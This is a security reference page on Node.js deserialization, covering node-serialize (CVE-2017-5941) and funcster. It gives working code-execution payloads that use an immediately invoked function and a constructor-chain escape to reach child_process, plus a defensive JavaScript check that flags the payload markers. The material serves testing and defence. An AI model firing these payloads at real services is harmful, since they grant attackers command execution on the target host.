# Node Deserialization
> Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
## Summary

* [Methodology](#methodology)
    * [node-serialize](#node-serialize)
    * [funcster](#funcster)
* [References](#references)

## Methodology

* In Node source code, look for:
    * `node-serialize`
    * `serialize-to-js`
    * `funcster`

### node-serialize
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
1. Generate a serialized payload
```js
// Object with a function property; node-serialize encodes the function as a string
var y = {
    rce : function(){
        require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
    },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
```
2. Append `()` after the serialized function so it becomes an IIFE and executes as soon as `unserialize()` processes the payload
```js
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
```
3. Send the payload
### funcster
```js
{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
```
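
A defensive check for the two payload shapes shown above, as an added example that is not part of the original page: it parses input with `JSON.parse` (which never produces functions) and flags any string carrying the node-serialize `_$$ND_FUNC$$_` marker or any `__js_function` key. The function names and sample bodies are constructed for illustration.

```javascript
// Added example (not from the original page): screen JSON input for the
// function-carrying markers used by node-serialize and funcster payloads.
const ND_FUNC_MARKER = '_$$ND_FUNC$$_'; // node-serialize function prefix
const FUNCSTER_KEY = '__js_function';   // funcster function key

// Walk a parsed JSON value and collect the paths of suspicious entries.
function findFunctionMarkers(value, path = '$', hits = []) {
  if (typeof value === 'string') {
    if (value.includes(ND_FUNC_MARKER)) hits.push({ path, marker: ND_FUNC_MARKER });
  } else if (Array.isArray(value)) {
    value.forEach((item, i) => findFunctionMarkers(item, `${path}[${i}]`, hits));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      if (key === FUNCSTER_KEY) hits.push({ path: `${path}.${key}`, marker: FUNCSTER_KEY });
      findFunctionMarkers(child, `${path}.${key}`, hits);
    }
  }
  return hits;
}

// Parse untrusted text as plain data only; reject it if any marker is present.
function parseUntrusted(text) {
  let data;
  try {
    data = JSON.parse(text);
  } catch (err) {
    return { ok: false, reason: 'invalid JSON', hits: [] };
  }
  const hits = findFunctionMarkers(data);
  if (hits.length > 0) return { ok: false, reason: 'function marker in input', hits };
  return { ok: true, data, hits };
}

// Constructed sample bodies; the function text is a harmless stub.
const samples = [
  '{"user":"alice","roles":["admin"]}',
  '{"rce":"_$$ND_FUNC$$_function(){ /* body */ }()"}',
  '{"profile":{"cb":{"__js_function":"function(){ /* body */ }()"}}}',
];
for (const body of samples) {
  const r = parseUntrusted(body);
  const where = r.hits.map((h) => h.path).join(', ');
  console.log(r.ok ? 'accept' : `reject (${r.reason} at ${where})`);
}
```

Marker screening is a detection layer for gateways and logs; the fix remains keeping untrusted input away from `unserialize()` and funcster and treating it as plain data.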
## References

- [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
- [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
- [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)